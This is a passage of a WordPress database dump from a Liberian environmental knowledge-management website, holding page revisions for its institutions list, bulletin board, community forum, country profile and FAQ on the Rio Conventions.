Authority\" width=\"1024\" height=\"531\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_epa.jpg\" alt=\"Environmental Protection Agency\" width=\"1024\" height=\"563\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_lisgis.jpg\" alt=\"Liberia Institute for Statistics and Geo-Information Services\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-16 14:01:58','2019-11-16 14:01:58','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(2479,1,'2019-11-16 14:02:36','2019-11-16 14:02:36','<h2>Institutions</h2>		\n	<a href=\"https://ekmsliberia.info/institution/water-sanitation-and-hygiene-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_wash.jpg\" alt=\"Liberia National Water, Sanitation and Hygiene - WASH Commission\" width=\"1024\" height=\"522\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/water-sanitation-and-hygiene-liberia/\">Liberia National Water, Sanitation and Hygiene - WASH Commission</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ffi.png\" alt=\"Fauna &amp; Flora International\" width=\"1024\" height=\"504\"></a><a href=\"https://ekmsliberia.info/institutions-category/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/conservation-international/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ci.jpg\" alt=\"Conservation International\" width=\"1024\" height=\"523\"></a><a href=\"https://ekmsliberia.info/institutions-category/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme.jpg\" alt=\"Ministry of Mines and Energy\" width=\"1024\" height=\"482\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Featured_lla.jpg\" alt=\"Liberia Land Authority\" width=\"1024\" height=\"502\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fda0.jpg\" alt=\"Forestry Development Authority\" width=\"1024\" height=\"531\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_epa.jpg\" alt=\"Environmental Protection Agency\" width=\"1024\" height=\"563\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_lisgis.jpg\" alt=\"Liberia Institute for Statistics and Geo-Information Services\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-16 14:02:36','2019-11-16 14:02:36','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(2483,1,'2019-11-16 15:09:17','2019-11-16 15:09:17','','EKMS Bulletins','','publish','closed','closed','','ekms_bulletin','','','2021-08-18 17:55:06','2021-08-18 17:55:06','',0,'https://ekmsliberia.info/?post_type=_pods_pod&#038;p=2483',0,'_pods_pod','',0),(2484,1,'2019-11-16 15:12:44','2019-11-16 15:12:44','','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:12:44','2019-11-16 15:12:44','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2486,1,'2019-11-16 15:18:13','2019-11-16 15:18:13','<h2>You are on the EKMS Bulletin Board:</h2>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:18:13','2019-11-16 15:18:13','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2488,1,'2019-11-16 15:21:21','2019-11-16 15:21:21','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>Here you can search the bulletins for funding announcements, jobs, and other related openings.</p>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:21:21','2019-11-16 15:21:21','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2489,1,'2019-11-16 15:22:58','2019-11-16 15:22:58','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>Here you can search the bulletins for funding announcements, jobs, and other related openings.</p>','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:22:58','2019-11-16 15:22:58','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2492,1,'2019-11-16 15:46:24','2019-11-16 15:46:24','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/new-funding-opportunities-for-improving-lives-of-vulnerable-communities-in-africa/\">New Funding Opportunities for improving Lives of Vulnerable Communities in Africa</a>These amazing funding opportunities providing...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:46:24','2019-11-16 15:46:24','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2493,1,'2019-11-16 15:47:07','2019-11-16 15:47:07','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/new-funding-opportunities-for-improving-lives-of-vulnerable-communities-in-africa/\">New Funding Opportunities for improving Lives of Vulnerable Communities in Africa</a>These amazing funding opportunities providing...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:47:07','2019-11-16 15:47:07','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2494,1,'2019-11-16 15:48:53','2019-11-16 15:48:53','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/new-funding-opportunities-for-improving-lives-of-vulnerable-communities-in-africa/\">New Funding Opportunities for improving Lives of Vulnerable Communities in Africa</a><a href=\"https://ekmsliberia.info/2019/11/16/\"  ><time datetime=\"2019-11-16T15:27:23+00:00\" title=\"2019-11-16T15:27:23+00:00\">November 16, 2019</time></a>These amazing funding opportunities providing...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:48:53','2019-11-16 15:48:53','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2495,1,'2019-11-16 15:51:41','2019-11-16 15:51:41','<h2>You are on the EKMS Bulletin Board:</h2>\nThis bulletin provides a space for funding announcements, jobs, and other related openings.\n\n<a href=\"https://ekmsliberia.info/ekms-bulletin/new-funding-opportunities-for-improving-lives-of-vulnerable-communities-in-africa/\">New Funding Opportunities for improving Lives of Vulnerable Communities in Africa</a><a href=\"https://ekmsliberia.info/2019/11/16/\"><time datetime=\"2019-11-16T15:27:23+00:00\" title=\"2019-11-16T15:27:23+00:00\">November 16, 2019</time></a>These amazing funding opportunities providing...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:51:41','2019-11-16 15:51:41','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2496,1,'2019-11-16 15:53:38','2019-11-16 15:53:38','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/new-funding-opportunities-for-improving-lives-of-vulnerable-communities-in-africa/\">New Funding Opportunities for improving Lives of Vulnerable Communities in Africa</a><a href=\"https://ekmsliberia.info/2019/11/16/\"  ><time datetime=\"2019-11-16T15:27:23+00:00\" title=\"2019-11-16T15:27:23+00:00\">November 16, 2019</time></a>These amazing funding opportunities providing complete financial assistance to NGOs...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:53:38','2019-11-16 15:53:38','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2497,1,'2019-11-16 15:54:26','2019-11-16 15:54:26','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/new-funding-opportunities-for-improving-lives-of-vulnerable-communities-in-africa/\">New Funding Opportunities for improving Lives of Vulnerable Communities in Africa</a><a href=\"https://ekmsliberia.info/2019/11/16/\"  ><time datetime=\"2019-11-16T15:27:23+00:00\" title=\"2019-11-16T15:27:23+00:00\">November 16, 2019</time></a>These amazing funding opportunities providing complete financial assistance to NGOs...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:54:26','2019-11-16 15:54:26','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2498,1,'2019-11-16 15:55:54','2019-11-16 15:55:54','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/new-funding-opportunities-for-improving-lives-of-vulnerable-communities-in-africa/\">New Funding Opportunities for improving Lives of Vulnerable Communities in Africa</a><a href=\"https://ekmsliberia.info/2019/11/16/\"  ><time datetime=\"2019-11-16T15:27:23+00:00\" title=\"2019-11-16T15:27:23+00:00\">November 16, 2019</time></a>These amazing funding opportunities providing complete financial assistance to NGOs...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:55:54','2019-11-16 15:55:54','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2499,1,'2019-11-16 15:56:01','2019-11-16 15:56:01','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/new-funding-opportunities-for-improving-lives-of-vulnerable-communities-in-africa/\">New Funding Opportunities for improving Lives of Vulnerable Communities in Africa</a><a href=\"https://ekmsliberia.info/2019/11/16/\"  ><time datetime=\"2019-11-16T15:27:23+00:00\" title=\"2019-11-16T15:27:23+00:00\">November 16, 2019</time></a>These amazing funding opportunities providing complete financial assistance to NGOs...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:56:01','2019-11-16 15:56:01','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2500,1,'2019-11-16 15:57:04','2019-11-16 15:57:04','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/new-funding-opportunities-for-improving-lives-of-vulnerable-communities-in-africa/\">New Funding Opportunities for improving Lives of Vulnerable Communities in Africa</a><a href=\"https://ekmsliberia.info/2019/11/16/\"  ><time datetime=\"2019-11-16T15:27:23+00:00\" title=\"2019-11-16T15:27:23+00:00\">November 16, 2019</time></a>These amazing funding opportunities providing complete financial assistance to NGOs...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2019-11-16 15:57:04','2019-11-16 15:57:04','',72,'https://ekmsliberia.info/72-revision-v1/',0,'revision','',0),(2501,1,'2019-11-16 16:07:10','2019-11-16 16:07:10','<!-- wp:paragraph -->\n<p>Coming soon!</p>\n<!-- /wp:paragraph -->','Contribute','','inherit','closed','closed','','74-revision-v1','','','2019-11-16 16:07:10','2019-11-16 16:07:10','',74,'https://ekmsliberia.info/74-revision-v1/',0,'revision','',0),(2502,1,'2019-11-16 16:07:25','2019-11-16 16:07:25','<!-- wp:paragraph -->\n<p> Coming soon! </p>\n<!-- /wp:paragraph -->','Maps','','inherit','closed','closed','','108-revision-v1','','','2019-11-16 16:07:25','2019-11-16 16:07:25','',108,'https://ekmsliberia.info/108-revision-v1/',0,'revision','',0),(2503,1,'2019-11-16 16:15:41','2019-11-16 16:15:41','<h2>The EKMS Community Forum</h2>		\n		<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.</p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.</p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.</p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. <strong>Please note that any inappropriate contents including topics/questions/comments/images/videos posted on the community forum, will be removed by the forum moderators.</strong></p><p>If you are already a member of the EKMS community, please <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Join Us!</a></p>','Join the Community','','publish','closed','closed','','join-the-community','','','2019-12-03 19:14:05','2019-12-03 19:14:05','',0,'https://ekmsliberia.info/?page_id=2503',0,'page','',0),(2504,1,'2019-11-16 16:15:40','2019-11-16 16:15:40','<!-- wp:paragraph -->\n<p>The EKMS Community Forum</p>\n<!-- /wp:paragraph -->','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-16 16:15:40','2019-11-16 16:15:40','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2507,1,'2019-11-16 16:46:20','2019-11-16 16:46:20','<!-- wp:paragraph -->\n<p>The EKMS Community Forum</p>\n<!-- /wp:paragraph -->','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-16 16:46:20','2019-11-16 16:46:20','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2509,1,'2022-08-22 10:08:38','2019-11-16 18:30:51',' ','','','publish','closed','closed','','2509','','','2022-08-22 10:08:38','2022-08-22 10:08:38','',0,'https://ekmsliberia.info/?p=2509',15,'nav_menu_item','',0),(2510,1,'2019-11-16 18:33:36','2019-11-16 18:33:36','<h2>The EKMS Community Forum</h2>		\n		<!-- wp:paragraph -->\n<p>The EKMS Community Forum</p>\n<!-- /wp:paragraph -->','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-16 18:33:36','2019-11-16 18:33:36','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2511,1,'2019-11-16 18:42:27','2019-11-16 18:42:27','<h2>The EKMS Community Forum</h2>		\n		<p>Similar to other Social media site such as Facebook and Twitter, the EKMS Coummunity Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions.</p>\n<p>\nGenerally, topics opened for discussions are about Biodiversity, Climate Change and ways to combat desertification.</p>\n<p>\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.\n</p>\n<p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia, related topics, and documents, etc. Discussion is by all means restricted to registered users only.</p>','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-16 18:42:27','2019-11-16 18:42:27','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2512,1,'2019-11-16 18:48:44','2019-11-16 18:48:44','<h2>The EKMS Community Forum</h2>		\n		<p>Similar to other Social media site such as Facebook and Twitter, the EKMS Coummunity Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions.</p>\n<p>\nGenerally, topics opened for discussions are about Biodiversity, Climate Change and ways to combat desertification.</p>\n<p>\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.\n</p>\n<p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia, related topics, and documents, etc. Discussion is by all means restricted to registered users only.</p>','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-16 18:48:44','2019-11-16 18:48:44','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2514,1,'2019-11-16 19:15:31','2019-11-16 19:15:31','<h2>The EKMS Community Forum</h2>		\n		<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.</p>\n<p>\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.</p>\n<p>\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.\n</p>\n<p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia.  Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <a href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Join Us!</a></p>\n<p>\n<strong>Added Tools to the Community:</strong>\n</p>\n<p>Members Chat (Activated)<p>\n<p>Group online meetings hosting or Video Conferencing (In Progress)<p>\n<p>Event Setup (In Progress)<p>','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-16 19:15:31','2019-11-16 19:15:31','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2515,1,'2019-11-16 19:17:57','2019-11-16 19:17:57','<h2>The EKMS Community Forum</h2>		\n		<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.</p>\n<p>\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.</p>\n<p>\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.\n</p>\n<p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia.  Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <a href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Join Us!</a></p>\n<p>\n<strong>Added Tools to the Community:</strong>\n</p>\n<p>Members Chat (Activated)</p>\n<p>Group Chatting (In Progress)</p>\n<p>Group online meetings hosting or Video Conferencing (In Progress)</p>\n<p>Events Setup (In Progress)</p>','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-16 19:17:57','2019-11-16 19:17:57','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2516,1,'2019-11-16 19:20:21','2019-11-16 19:20:21','<h2>The EKMS Community Forum</h2>		\n		<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.</p>\n<p>\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.</p>\n<p>\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.\n</p>\n<p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia.  Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <a href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Join Us!</a></p>\n<p>\n<strong>Added Tools to the Community:</strong>\n</p>\n<p>Members Chat (Activated)</p>\n<p>Group Chatting (In Progress)</p>\n<p>Group online meetings hosting or Video Conferencing (In Progress)</p>\n<p>Events Setup (In Progress)</p>','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-16 19:20:21','2019-11-16 19:20:21','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2517,1,'2019-11-16 19:23:20','2019-11-16 19:23:20','<h2>The EKMS Community Forum</h2>\nLike other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.\n\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.\n\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.\n\nFeel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia.  Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <a href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Join Us!</a>\n\n<strong>Added Tools to the Community:</strong>\n\nMembers Chat (Activated)\n\nGroup Chatting (In Progress)\n\nGroup online meetings hosting or Video Conferencing (In Progress)\n\nEvents Setup (In Progress)','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-16 19:23:20','2019-11-16 19:23:20','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2518,1,'2019-11-16 19:26:53','2019-11-16 19:26:53','<img width=\"150\" height=\"150\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal-150x150.png\" alt=\"\">\n<h2>Republic of Liberia</h2>\nLiberia is a relatively small country located within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean.&nbsp;In terms of land area, Liberia&nbsp;&nbsp;is&nbsp;approximately 111,369 km2 and is the fifth smallest country in Africa.\n\nThe extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005).The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.\n\nThe perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.\n\nLiberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-16 19:26:53','2019-11-16 19:26:53','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(2519,1,'2019-11-16 19:34:50','2019-11-16 19:34:50','<h2>GENERAL</h2>\n<a href=\"\">What is the EKMS?</a>\n\nThe Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the EPA and twelve other Liberian government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education. It also focuses on the three RIO conventions; United Nations Framework on Climate Change, United Nations Convention to Combat Desertification, and United Nations Convention on Biodiversity.\n\n<a href=\"\">How many institutions are involved?</a>\n\nThere are 12 national institutions involved;\nForest Development Authority (FDA)\nMinistry of Agriculture (MOA)\nCentral Agriculture Research Institute (CIRA)\nLiberia Land Authority (LLA)\nNational Fisheries and Aquaculture Authority (NFAA)\nLiberia Maritime Authority (LMA)\nMinistry of Mines and Energy (MME)\nMinistry of Public Works (MoPW)\nMinistry of Internal Affairs (MIA)\nLiberia Bureau of Concessions\nMinistry of Gender\nLiberia Institute of Statistics and Geo-Information Services (LISGIS)\n\n<a href=\"\">Accordion Title</a>\nAccordion Content\n<h2>UNFCCC</h2>\n<a href=\"\">When should I accredit myself for UNFCCC meetings?</a>\n\nAccreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.\n\n<a href=\"\">I want to get graphs and data about climate change. What is available and can I use it?</a>\n\nAll official texts, 